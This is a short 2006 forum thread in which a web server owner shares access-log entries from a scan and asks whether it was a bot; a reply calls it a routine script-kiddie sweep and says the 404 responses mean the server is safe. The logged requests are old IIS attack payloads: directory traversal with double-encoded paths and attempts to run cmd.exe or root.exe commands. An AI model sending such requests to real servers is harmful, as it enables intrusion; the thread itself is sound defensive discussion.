hacker? just thought i'd share these logs with you...

jamesthemagician

Hi :D
I was looking through my log and found this:

80.200.90.185 - - [21/Sep/2006:14:03:50 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 403 "" ""
80.200.90.185 - - [21/Sep/2006:14:03:50 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 403 "" ""
80.200.90.185 - - [21/Sep/2006:14:03:50 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 403 "" ""
80.200.90.185 - - [21/Sep/2006:14:03:50 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 403 "" ""
80.200.90.185 - - [21/Sep/2006:14:03:51 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 403 "" ""
80.200.90.185 - - [21/Sep/2006:14:03:51 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 403 "" ""
80.200.90.185 - - [21/Sep/2006:14:03:51 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 403 "" ""
80.200.90.185 - - [21/Sep/2006:14:03:52 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 403 "" ""
80.200.90.185 - - [21/Sep/2006:14:03:52 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 403 "" ""

Am i right in saying that he did that in 3 seconds?
Do you think this is a bot that someone has set up to find vulnerable sites?

He wasn't blocked by the antihacking feature because he didn't make enough bad requests.

O and does anyone recognise the ip from your logs?
_________________
This signature is getting old

cmxflash · - Joined: 11 Dec 2004 Posts: 872

Probably just some lame skiddie searching random addresses for vurnable scripts. Since Abyss returned 404 on those requests, your server is safe. I get tons of those requests.

jamesthemagician · Posted: Thu Sep 21, 2006 6:44 pm Post subject:

gdgd :D
_________________
This signature is getting old